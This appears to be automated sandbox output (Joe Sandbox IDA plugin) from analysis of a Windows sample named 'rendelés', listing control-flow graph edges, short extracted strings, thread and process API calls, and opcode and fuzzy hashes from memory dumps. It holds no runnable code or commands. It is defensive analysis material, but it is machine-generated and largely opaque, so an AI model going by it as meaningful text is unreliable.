                                                                • Instruction Fuzzy Hash: 78E15934E102098FDB19DFA8D590A9EB7F7BF85300F10856AD809AF395EB75D846CB81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 918 357ca870-357ca88b 919 357ca88d-357ca890 918->919 920 357cad5c-357cad68 919->920 921 357ca896-357ca899 919->921 922 357ca99e-357ca9ad 920->922 923 357cad6e-357cb05b 920->923 927 357ca89b-357ca8aa 921->927 928 357ca8e2-357ca8e5 921->928 925 357ca9bc-357ca9c8 922->925 926 357ca9af-357ca9b4 922->926 1136 357cb061-357cb067 923->1136 1137 357cb282-357cb28c 923->1137 931 357cb28d-357cb2a2 925->931 932 357ca9ce-357ca9e0 925->932 926->925 934 357ca8ac-357ca8b1 927->934 935 357ca8b9-357ca8c5 927->935 929 357ca92e-357ca931 928->929 930 357ca8e7-357ca929 928->930 936 357ca940-357ca943 929->936 937 357ca933-357ca935 929->937 930->929 954 357cb2d9-357cb2f9 931->954 955 357cb2a4-357cb2c6 931->955 949 357ca9e5-357ca9e8 932->949 934->935 935->931 938 357ca8cb-357ca8dd 935->938 941 357ca98c-357ca98f 936->941 942 357ca945-357ca987 936->942 939 357cad59 937->939 940 357ca93b 937->940 938->928 939->920 940->936 950 357ca999-357ca99c 941->950 951 357ca991-357ca996 941->951 942->941 956 357ca9ea-357caa2c 949->956 957 357caa31-357caa34 949->957 950->922 950->949 951->950 962 357cb2fe-357cb301 954->962 959 357cb2c8-357cb2cb 955->959 956->957 960 357caa7d-357caa80 957->960 961 357caa36-357caa78 957->961 959->962 965 357cb2cd-357cb2d5 959->965 963 357caa9d-357caaa0 960->963 964 357caa82-357caa98 960->964 961->960 967 357cb324-357cb327 962->967 968 357cb303-357cb31f 962->968 973 357caaaf-357caab2 963->973 974 357caaa2-357caaa4 963->974 964->963 965->954 976 357cb329 call 357cb3e5 967->976 977 357cb336-357cb338 967->977 968->967 986 357caafb-357caafe 973->986 987 357caab4-357caaf6 973->987 982 357caaaa 974->982 983 357cac17-357cac20 974->983 996 357cb32f-357cb331 976->996 979 357cb33f-357cb342 977->979 980 357cb33a 977->980 979->959 990 357cb344-357cb353 979->990 980->979 982->973 991 357cac2f-357cac3b 983->991 992 357cac22-357cac27 983->992 993 357cab47-357cab4a 986->993 994 357cab00-357cab42 986->994 987->986 1015 357cb3ba-357cb3cf 990->1015 1016 357cb355-357cb3b8 call 357c3ee8 990->1016 1001 357cad4c-357cad51 991->1001 1002 357cac41-357cac55 991->1002 992->991 997 357cab4c-357cab8e 993->997 998 357cab93-357cab96 993->998 994->993 996->977 997->998 1009 357cab98-357cabb4 998->1009 1010 357cabb9-357cabbc 998->1010 1001->939 1002->939 1026 357cac5b-357cac6d 1002->1026 1009->1010 1021 357cabbe-357cac00 1010->1021 1022 357cac05-357cac07 1010->1022 1040 357cb3d0 1015->1040 1016->1015 1021->1022 1024 357cac0e-357cac11 1022->1024 1025 357cac09 1022->1025 1024->919 1024->983 1025->1024 1046 357cac6f-357cac75 1026->1046 1047 357cac91-357cac93 1026->1047 1040->1040 1050 357cac79-357cac85 1046->1050 1051 357cac77 1046->1051 1058 357cac9d-357caca9 1047->1058 1056 357cac87-357cac8f 1050->1056 1051->1056 1056->1058 1068 357cacab-357cacb5 1058->1068 1069 357cacb7 1058->1069 1072 357cacbc-357cacbe 1068->1072 1069->1072 1072->939 1074 357cacc4-357cace0 call 357c3ee8 1072->1074 1082 357cacef-357cacfb 1074->1082 1083 357cace2-357cace7 1074->1083 1082->1001 1086 357cacfd-357cad4a 1082->1086 1083->1082 1086->939 1138 357cb069-357cb06e 1136->1138 1139 357cb076-357cb07f 1136->1139 1138->1139 1139->931 1140 357cb085-357cb098 1139->1140 1142 357cb09e-357cb0a4 1140->1142 1143 357cb272-357cb27c 1140->1143 1144 357cb0a6-357cb0ab 1142->1144 1145 357cb0b3-357cb0bc 1142->1145 1143->1136 1143->1137 1144->1145 1145->931 1146 357cb0c2-357cb0e3 1145->1146 1149 357cb0e5-357cb0ea 1146->1149 1150 357cb0f2-357cb0fb 1146->1150 1149->1150 1150->931 1151 357cb101-357cb11e 1150->1151 1151->1143 1154 357cb124-357cb12a 1151->1154 1154->931 1155 357cb130-357cb149 1154->1155 1157 357cb14f-357cb176 1155->1157 1158 357cb265-357cb26c 1155->1158 1157->931 1161 357cb17c-357cb186 1157->1161 1158->1143 1158->1154 1161->931 1162 357cb18c-357cb1a3 1161->1162 1164 357cb1a5-357cb1b0 1162->1164 1165 357cb1b2-357cb1cd 1162->1165 1164->1165 1165->1158 1170 357cb1d3-357cb1ec call 357c3ee8 1165->1170 1174 357cb1ee-357cb1f3 1170->1174 1175 357cb1fb-357cb204 1170->1175 1174->1175 1175->931 1176 357cb20a-357cb25e 1175->1176 1176->1158
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (L$(L$$]q$$]q$$]q
                                                                • API String ID: 0-1144578805
                                                                • Opcode ID: 8b3d58eb1f94917764b3ee4796520543351c8c16d8fea75e681edfd911d73dde
                                                                • Instruction ID: 456a702c862ee8a84406ebfd5501e0a79027788db78763c630be6816b62e1428
                                                                • Opcode Fuzzy Hash: 8b3d58eb1f94917764b3ee4796520543351c8c16d8fea75e681edfd911d73dde
                                                                • Instruction Fuzzy Hash: D9624C306003068FCB15EF68D590A9EB7E6FF84344B608A68D4599F369DB75ED4BCB80

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1184 357c20c0-357c20e4 1185 357c20e6-357c20e9 1184->1185 1186 357c210a-357c210d 1185->1186 1187 357c20eb-357c2105 1185->1187 1188 357c27ec-357c27ee 1186->1188 1189 357c2113-357c220b 1186->1189 1187->1186 1190 357c27f5-357c27f8 1188->1190 1191 357c27f0 1188->1191 1207 357c228e-357c2295 1189->1207 1208 357c2211-357c225e call 357c2968 1189->1208 1190->1185 1193 357c27fe-357c280b 1190->1193 1191->1190 1209 357c2319-357c2322 1207->1209 1210 357c229b-357c230b 1207->1210 1221 357c2264-357c2280 1208->1221 1209->1193 1227 357c230d 1210->1227 1228 357c2316 1210->1228 1224 357c228b 1221->1224 1225 357c2282 1221->1225 1224->1207 1225->1224 1227->1228 1228->1209
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fbq$XPbq$\Obq$J-5$J-5
                                                                • API String ID: 0-3995806709
                                                                • Opcode ID: f0268e047ab84bb2fa8dc6196f1012b5c29e0e8b39d1a28d8b0d1744c9f07e22
                                                                • Instruction ID: df82d94035b904c5c6ee4ab25594e7905cdc57741fde394a676f793896dd1b93
                                                                • Opcode Fuzzy Hash: f0268e047ab84bb2fa8dc6196f1012b5c29e0e8b39d1a28d8b0d1744c9f07e22
                                                                • Instruction Fuzzy Hash: 90616E34F002199FEB149FA5C854B9EBAF6FB88300F208569E146EB395DF758D428F91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1230 35c92e02-35c92e97 GetCurrentProcess 1234 35c92e99-35c92e9f 1230->1234 1235 35c92ea0-35c92ed4 GetCurrentThread 1230->1235 1234->1235 1236 35c92edd-35c92f11 GetCurrentProcess 1235->1236 1237 35c92ed6-35c92edc 1235->1237 1238 35c92f1a-35c92f35 call 35c92fd8 1236->1238 1239 35c92f13-35c92f19 1236->1239 1237->1236 1243 35c92f3b-35c92f6a GetCurrentThreadId 1238->1243 1239->1238 1244 35c92f6c-35c92f72 1243->1244 1245 35c92f73-35c92fd5 1243->1245 1244->1245
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 35C92E86
                                                                • GetCurrentThread.KERNEL32 ref: 35C92EC3
                                                                • GetCurrentProcess.KERNEL32 ref: 35C92F00
                                                                • GetCurrentThreadId.KERNEL32 ref: 35C92F59
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: b12693cc07236fea3e53fbfa4aaa8f268ff0170d2dc410761fa57efb73881fb8
                                                                • Instruction ID: 37c98ad9c075cce04a245c57ff446e262415625753ae943d4f12cd1c8b1491cf
                                                                • Opcode Fuzzy Hash: b12693cc07236fea3e53fbfa4aaa8f268ff0170d2dc410761fa57efb73881fb8
                                                                • Instruction Fuzzy Hash: 485148B09002098FDB44DFA9D948BDEBBF1FF48314F208459E459B7360D7349985CBA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1252 35c92e08-35c92e97 GetCurrentProcess 1256 35c92e99-35c92e9f 1252->1256 1257 35c92ea0-35c92ed4 GetCurrentThread 1252->1257 1256->1257 1258 35c92edd-35c92f11 GetCurrentProcess 1257->1258 1259 35c92ed6-35c92edc 1257->1259 1260 35c92f1a-35c92f35 call 35c92fd8 1258->1260 1261 35c92f13-35c92f19 1258->1261 1259->1258 1265 35c92f3b-35c92f6a GetCurrentThreadId 1260->1265 1261->1260 1266 35c92f6c-35c92f72 1265->1266 1267 35c92f73-35c92fd5 1265->1267 1266->1267
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 35C92E86
                                                                • GetCurrentThread.KERNEL32 ref: 35C92EC3
                                                                • GetCurrentProcess.KERNEL32 ref: 35C92F00
                                                                • GetCurrentThreadId.KERNEL32 ref: 35C92F59
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: f4dbd2bcd1244d82ea10916b0ec257c3feb0fec26adc3dd70c7269b521d356c4
                                                                • Instruction ID: 433150ee288d275b91d27d8084e01c0a578d08c18715a24cc35046a9a4a44d2f
                                                                • Opcode Fuzzy Hash: f4dbd2bcd1244d82ea10916b0ec257c3feb0fec26adc3dd70c7269b521d356c4
                                                                • Instruction Fuzzy Hash: 8D5158B09003098FDB44DFA9D944BDEBBF1FF48314F208459E449A7350DB389981CBA5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1274 117998-1179af 1275 1179b1-1179b4 1274->1275 1276 1179e1-1179e4 1275->1276 1277 1179b6-1179dc 1275->1277 1278 117a11-117a14 1276->1278 1279 1179e6-117a0c 1276->1279 1277->1276 1280 117a41-117a44 1278->1280 1281 117a16-117a3c 1278->1281 1279->1278 1284 117a71-117a74 1280->1284 1285 117a46-117a6c 1280->1285 1281->1280 1286 117aa1-117aa4 1284->1286 1287 117a76-117a9c 1284->1287 1285->1284 1292 117ad1-117ad4 1286->1292 1293 117aa6-117acc 1286->1293 1287->1286 1294 117b01-117b04 1292->1294 1295 117ad6-117afc 1292->1295 1293->1292 1302 117b31-117b34 1294->1302 1303 117b06-117b2c 1294->1303 1295->1294 1304 117b61-117b64 1302->1304 1305 117b36-117b5c 1302->1305 1303->1302 1312 117b91-117b94 1304->1312 1313 117b66-117b8c 1304->1313 1305->1304 1314 117bc1-117bc4 1312->1314 1315 117b96-117bbc 1312->1315 1313->1312 1322 117bf1-117bf4 1314->1322 1323 117bc6-117bec 1314->1323 1315->1314 1324 117c21-117c24 1322->1324 1325 117bf6-117c1c 1322->1325 1323->1322 1332 117c51-117c54 1324->1332 1333 117c26-117c4c 1324->1333 1325->1324 1334 117c81-117c84 1332->1334 1335 117c56-117c7c 1332->1335 1333->1332 1342 117cb1-117cb4 1334->1342 1343 117c86-117cac 1334->1343 1335->1334 1344 117ce1-117ce4 1342->1344 1345 117cb6-117cdc 1342->1345 1343->1342 1352 117cf1-117cf4 1344->1352 1353 117ce6 1344->1353 1345->1344 1354 117d21-117d24 1352->1354 1355 117cf6-117d1c 1352->1355 1359 117cec 1353->1359 1362 117d51-117d54 1354->1362 1363 117d26-117d4c 1354->1363 1355->1354 1359->1352 1364 117d81-117d84 1362->1364 1365 117d56-117d7c 1362->1365 1363->1362 1370 117da1-117da4 1364->1370 1371 117d86-117d9c 1364->1371 1365->1364 1373 117dd1-117dd4 1370->1373 1374 117da6-117dcc 1370->1374 1371->1370 1378 117e01-117e04 1373->1378 1379 117dd6-117dfc 1373->1379 1374->1373 1382 117e31-117e34 1378->1382 1383 117e06-117e2c 1378->1383 1379->1378 1388 117e61-117e64 1382->1388 1389 117e36-117e5c 1382->1389 1383->1382 1392 117e91-117e94 1388->1392 1393 117e66-117e8c 1388->1393 1389->1388 1397 117ec1-117ec4 1392->1397 1398 117e96-117ebc 1392->1398 1393->1392 1401 117ef1-117ef4 1397->1401 1402 117ec6-117eec 1397->1402 1398->1397 1406 117ef6-117f0a 1401->1406 1407 117f0f-117f12 1401->1407 1402->1401 1406->1407 1414 117f23-117f26 1407->1414 1415 117f14-117f16 1407->1415 1416 117f53-117f56 1414->1416 1417 117f28-117f4e 1414->1417 1488 117f18 call 1191e1 1415->1488 1489 117f18 call 1191f0 1415->1489 1490 117f18 call 119293 1415->1490 1424 117f83-117f86 1416->1424 1425 117f58-117f7e 1416->1425 1417->1416 1421 117f1e 1421->1414 1426 117fb3-117fb6 1424->1426 1427 117f88-117fae 1424->1427 1425->1424 1432 117fe3-117fe6 1426->1432 1433 117fb8-117fde 1426->1433 1427->1426 1435 118013-118016 1432->1435 1436 117fe8-11800e 1432->1436 1433->1432 1439 118043-118046 1435->1439 1440 118018-11803e 1435->1440 1436->1435 1443 118073-118076 1439->1443 1444 118048-11806e 1439->1444 1440->1439 1449 1180a3-1180a6 1443->1449 1450 118078-11809e 1443->1450 1444->1443 1453 1180d3-1180d6 1449->1453 1454 1180a8-1180ce 1449->1454 1450->1449 1459 118103-118106 1453->1459 1460 1180d8-1180fe 1453->1460 1454->1453 1463 118133-118136 1459->1463 1464 118108-11812e 1459->1464 1460->1459 1469 118163-118165 1463->1469 1470 118138-11815e 1463->1470 1464->1463 1473 118167 1469->1473 1474 11816c-11816f 1469->1474 1470->1469 1473->1474 1474->1275 1479 118175-11817b 1474->1479 1488->1421 1489->1421 1490->1421
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -5$$-5$<!-5$!-5
                                                                • API String ID: 0-2801827867
                                                                • Opcode ID: 30ee10eab60bc43532fb71439e2fa19121cec737d269ee3910b21c0d78354cc0
                                                                • Instruction ID: 2367d3c6d5e4c06e3deb4dd2373bfb888c3b90b9cd4c4fb8b8f58f1e4429cb05
                                                                • Opcode Fuzzy Hash: 30ee10eab60bc43532fb71439e2fa19121cec737d269ee3910b21c0d78354cc0
                                                                • Instruction Fuzzy Hash: 00128C30B102028BCB19AB38E4556AC76E6FBC5360F204A79E455DB3A5DF75EC87DB80

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1686 357cbcba-357cbcc4 1687 357cbccc-357cbce9 1686->1687 1688 357cbcc6 1686->1688 1691 357cbceb-357cbcee 1687->1691 1689 357cbcfd-357cbd06 1688->1689 1690 357cbcc8-357cbcca 1688->1690 1694 357cbd0c-357cbd13 1689->1694 1695 357cbf74-357cbf82 1689->1695 1690->1687 1692 357cbcf8-357cbcfb 1691->1692 1693 357cbcf0-357cbcf5 1691->1693 1692->1689 1696 357cbd18-357cbd1b 1692->1696 1693->1692 1694->1696 1702 357cbfb9-357cbfce 1695->1702 1703 357cbf84-357cbfab 1695->1703 1697 357cbd1d 1696->1697 1698 357cbd2b-357cbd2e 1696->1698 1707 357cbd23-357cbd26 1697->1707 1700 357cbd30-357cbd4c 1698->1700 1701 357cbd51-357cbd54 1698->1701 1700->1701 1705 357cbf5a-357cbf63 1701->1705 1706 357cbd5a-357cbd5c 1701->1706 1727 357cc027-357cc02a 1702->1727 1728 357cbfd0 1702->1728 1704 357cbfad-357cbfb0 1703->1704 1708 357cbfd5-357cbfd8 1704->1708 1709 357cbfb2-357cbfb8 1704->1709 1705->1689 1713 357cbf69-357cbf73 1705->1713 1710 357cbd5e 1706->1710 1711 357cbd63-357cbd66 1706->1711 1707->1698 1716 357cc15e-357cc167 1708->1716 1717 357cbfde-357cbfe1 1708->1717 1709->1702 1710->1711 1711->1691 1715 357cbd68-357cbe1c 1711->1715 1838 357cbf18-357cbf3c 1715->1838 1839 357cbe22-357cbe2d 1715->1839 1720 357cc16d 1716->1720 1721 357cc007-357cc010 1716->1721 1722 357cc002-357cc005 1717->1722 1723 357cbfe3-357cbffd 1717->1723 1730 357cc172-357cc175 1720->1730 1725 357cc016-357cc01d 1721->1725 1726 357cc1a3-357cc1ba 1721->1726 1722->1721 1724 357cc022-357cc025 1722->1724 1723->1722 1724->1727 1731 357cc02f-357cc032 1724->1731 1725->1724 1741 357cc1bc-357cc1de 1726->1741 1742 357cc1f1-357cc1f3 1726->1742 1727->1731 1728->1708 1732 357cc17f-357cc181 1730->1732 1733 357cc177-357cc17a 1730->1733 1736 357cc03e-357cc041 1731->1736 1737 357cc034-357cc037 1731->1737 1739 357cc188-357cc18b 1732->1739 1740 357cc183 1732->1740 1733->1732 1745 357cc048-357cc04b 1736->1745 1746 357cc043-357cc045 1736->1746 1743 357cc039 1737->1743 1744 357cc052-357cc055 1737->1744 1739->1704 1747 357cc191-357cc1a2 1739->1747 1740->1739 1749 357cc1e0-357cc1e3 1741->1749 1750 357cc265-357cc292 1742->1750 1751 357cc1f5 1742->1751 1743->1736 1744->1726 1753 357cc05b-357cc05f 1744->1753 1745->1737 1752 357cc04d-357cc050 1745->1752 1746->1745 1756 357cc1fa-357cc1fd 1749->1756 1757 357cc1e5-357cc1e7 1749->1757 1788 357cc298-357cc2ba 1750->1788 1789 357cc421-357cc426 1750->1789 1751->1756 1752->1744 1758 357cc064-357cc067 1752->1758 1753->1758 1759 357cc21d-357cc220 1756->1759 1760 357cc1ff-357cc218 1756->1760 1757->1742 1762 357cc06f-357cc072 1758->1762 1763 357cc069-357cc06a 1758->1763 1767 357cc22d-357cc230 1759->1767 1768 357cc222-357cc22c 1759->1768 1760->1759 1765 357cc074-357cc090 1762->1765 1766 357cc095-357cc098 1762->1766 1763->1762 1765->1766 1772 357cc0af-357cc0b2 1766->1772 1773 357cc09a-357cc0a8 1766->1773 1770 357cc232-357cc24e 1767->1770 1771 357cc253-357cc255 1767->1771 1770->1771 1777 357cc25c-357cc25f 1771->1777 1778 357cc257 1771->1778 1779 357cc0bc-357cc0bf 1772->1779 1780 357cc0b4-357cc0b9 1772->1780 1773->1763 1791 357cc0aa 1773->1791 1777->1749 1777->1750 1778->1777 1785 357cc0cc-357cc0cf 1779->1785 1786 357cc0c1-357cc0c7 1779->1786 1780->1779 1792 357cc0e8-357cc0eb 1785->1792 1793 357cc0d1-357cc0e3 1785->1793 1786->1785 1803 357cc42b-357cc435 1788->1803 1804 357cc2c0-357cc2c9 1788->1804 1789->1803 1791->1772 1794 357cc0ed-357cc110 1792->1794 1795 357cc115-357cc118 1792->1795 1793->1792 1794->1795 1801 357cc129-357cc12c 1795->1801 1802 357cc11a-357cc124 1795->1802 1807 357cc12e-357cc154 1801->1807 1808 357cc159-357cc15c 1801->1808 1802->1801 1804->1789 1809 357cc2cf-357cc2d7 1804->1809 1807->1808 1808->1716 1808->1730 1812 357cc40d-357cc419 1809->1812 1813 357cc2dd-357cc2f6 1809->1813 1812->1804 1816 357cc41f 1812->1816 1824 357cc2fc-357cc323 1813->1824 1825 357cc403-357cc408 1813->1825 1816->1803 1824->1825 1831 357cc329-357cc351 1824->1831 1825->1812 1831->1825 1837 357cc357-357cc371 1831->1837 1837->1825 1844 357cc377-357cc393 1837->1844 1847 357cbf3e 1838->1847 1848 357cbf46 1838->1848 1845 357cbe2f-357cbe35 1839->1845 1846 357cbe45-357cbf12 call 357c3ee8 1839->1846 1844->1825 1856 357cc395-357cc3b4 1844->1856 1849 357cbe39-357cbe3b 1845->1849 1850 357cbe37 1845->1850 1846->1838 1846->1839 1847->1848 1848->1705 1849->1846 1850->1846 1856->1825 1861 357cc3b6-357cc401 call 357c3ee8 1856->1861 1861->1812
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0o@p$Dq@p$PH]q
                                                                • API String ID: 0-3731290017
                                                                • Opcode ID: a210d1aa4fdcd8722e2f1d9c86f89940aa8e84ad0bb7cf944d6e74831f5bc433
                                                                • Instruction ID: a1b0ea169a44737e3fd10e4d6434da19c8194bf886e32a680f8689654312c370
                                                                • Opcode Fuzzy Hash: a210d1aa4fdcd8722e2f1d9c86f89940aa8e84ad0bb7cf944d6e74831f5bc433
                                                                • Instruction Fuzzy Hash: 1C8155347502008FDB44DF28D998E9DBBE6FF89310B6185A9E40ADB362DB75EC06CB50

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1937 357c20b1-357c20ba 1938 357c20bc-357c20e4 1937->1938 1939 357c20f1-357c20fb 1937->1939 1940 357c20e6-357c20e9 1938->1940 1941 357c2102-357c2105 1939->1941 1942 357c210a-357c210d 1940->1942 1943 357c20eb-357c20fb 1940->1943 1941->1942 1944 357c27ec-357c27ee 1942->1944 1945 357c2113-357c220b 1942->1945 1943->1941 1946 357c27f5-357c27f8 1944->1946 1947 357c27f0 1944->1947 1962 357c228e-357c2295 1945->1962 1963 357c2211-357c225e call 357c2968 1945->1963 1946->1940 1949 357c27fe-357c280b 1946->1949 1947->1946 1964 357c2319-357c2322 1962->1964 1965 357c229b-357c230b 1962->1965 1976 357c2264-357c2280 1963->1976 1964->1949 1982 357c230d 1965->1982 1983 357c2316 1965->1983 1979 357c228b 1976->1979 1980 357c2282 1976->1980 1979->1962 1980->1979 1982->1983 1983->1964
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fbq$XPbq$J-5
                                                                • API String ID: 0-1230702270
                                                                • Opcode ID: 6b3f0818ae0399372f4f92268da78f044a020fdb5ef284512b7a8bb2608a7f45
                                                                • Instruction ID: db4209a881b7bd39e48256db326d9950bd31172840a2cb81d0aea9323a845713
                                                                • Opcode Fuzzy Hash: 6b3f0818ae0399372f4f92268da78f044a020fdb5ef284512b7a8bb2608a7f45
                                                                • Instruction Fuzzy Hash: D1518030F002099FEB549FA5C854B9EBBF6FF88700F208529E146AB395DF758D468B81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3106 116e9b-116ea2 3107 116ea4-116ece call 116c00 3106->3107 3108 116ed6-116f02 3106->3108 3107->3108 3116 116f04-116f1d call 11672c 3108->3116 3117 116f1e-116f2e 3108->3117 3121 116f30-116f4d 3117->3121 3122 116f62-116f65 3117->3122 3129 116f4f-116f52 3121->3129 3123 116f67-116f7b 3122->3123 3124 116f98-116f9b 3122->3124 3136 116f81 3123->3136 3137 116f7d-116f7f 3123->3137 3127 116fd7-116fda 3124->3127 3128 116f9d-116fd2 3124->3128 3131 116fdc-116fe3 3127->3131 3132 116fee-116ff0 3127->3132 3128->3127 3129->3122 3133 116f54 call 117998 3129->3133 3138 117160-117167 3131->3138 3139 116fe9 3131->3139 3134 116ff2 3132->3134 3135 116ff7-116ffa 3132->3135 3140 116f5a-116f5d 3133->3140 3134->3135 3135->3129 3141 117000-11700f 3135->3141 3144 116f84-116f93 3136->3144 3137->3144 3142 117176-11717d 3138->3142 3143 117169 3138->3143 3139->3132 3140->3122 3148 117011-117037 3141->3148 3149 117039-11704f 3141->3149 3146 11716f 3143->3146 3144->3124 3146->3142 3148->3149 3149->3138
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR]q$LR]q
                                                                • API String ID: 0-3917262905
                                                                • Opcode ID: 484252058c01ea409028625bdc0c00e43e525a01f1e20dd078eb25f69ddacd93
                                                                • Instruction ID: 32deb20d59592c0f8fd8078e8435859061dcf161ab64817fed2352c11033fcd1
                                                                • Opcode Fuzzy Hash: 484252058c01ea409028625bdc0c00e43e525a01f1e20dd078eb25f69ddacd93
                                                                • Instruction Fuzzy Hash: EB51E430E143169FDB19DFB9D4646AEBBB1EF86300F10847AE405EB291EB719C86CB41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \--5$\--5
                                                                • API String ID: 0-425160104
                                                                • Opcode ID: efa462c56763b62d66f2c28445c2173ef3bb719097bce18fe662b01e27f7abf7
                                                                • Instruction ID: 2ee441d710eafdb72f461b2e3ec6cc5cf99ffc69edf5171ebe92e6c74d5047c3
                                                                • Opcode Fuzzy Hash: efa462c56763b62d66f2c28445c2173ef3bb719097bce18fe662b01e27f7abf7
                                                                • Instruction Fuzzy Hash: F8419135E142068FCB19CBA4C45469EBBF2AF89310F14857AE815E7351DB70DC87CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \--5$\--5
                                                                • API String ID: 0-425160104
                                                                • Opcode ID: d813c8979504257f8bd20a42b4d04bffde40a3507fbb8ea5bbd1e94883d68388
                                                                • Instruction ID: 9c81cd4ad212b634de9881b70f9dd9753fbfe8c3449be1f207604b6d5a4bfdb2
                                                                • Opcode Fuzzy Hash: d813c8979504257f8bd20a42b4d04bffde40a3507fbb8ea5bbd1e94883d68388
                                                                • Instruction Fuzzy Hash: 16318431E142459FCB09CF74C4646DEFBB2BF86300F15C66AE866EB291D7709986CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \--5$\--5
                                                                • API String ID: 0-425160104
                                                                • Opcode ID: 89098d2403fe87e955d9322180a2cf90e138193d7815ec5cfe0160489d08c1ac
                                                                • Instruction ID: 19434a08e6f1f499647db9623f628fd4144f898b3bcad8a4b0ef8533a4d12075
                                                                • Opcode Fuzzy Hash: 89098d2403fe87e955d9322180a2cf90e138193d7815ec5cfe0160489d08c1ac
                                                                • Instruction Fuzzy Hash: 80315E35E106059BCB19CFA4C454A9EBBF6BF89310F108529E856E7390DB70EC87CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \--5$\--5
                                                                • API String ID: 0-425160104
                                                                • Opcode ID: cb4720be6d58fba49e7ca755a9497992073b52d967cc0df4c878d3ccdad9415b
                                                                • Instruction ID: 24011fa830c71b9549b4c3892dde41000ad26569e64104c97a51fe7351a7de78
                                                                • Opcode Fuzzy Hash: cb4720be6d58fba49e7ca755a9497992073b52d967cc0df4c878d3ccdad9415b
                                                                • Instruction Fuzzy Hash: 97314B35E1060A9BCB19DFA4C454A9EB7F6BF89310F108529E816E7390EB70EC87CB50
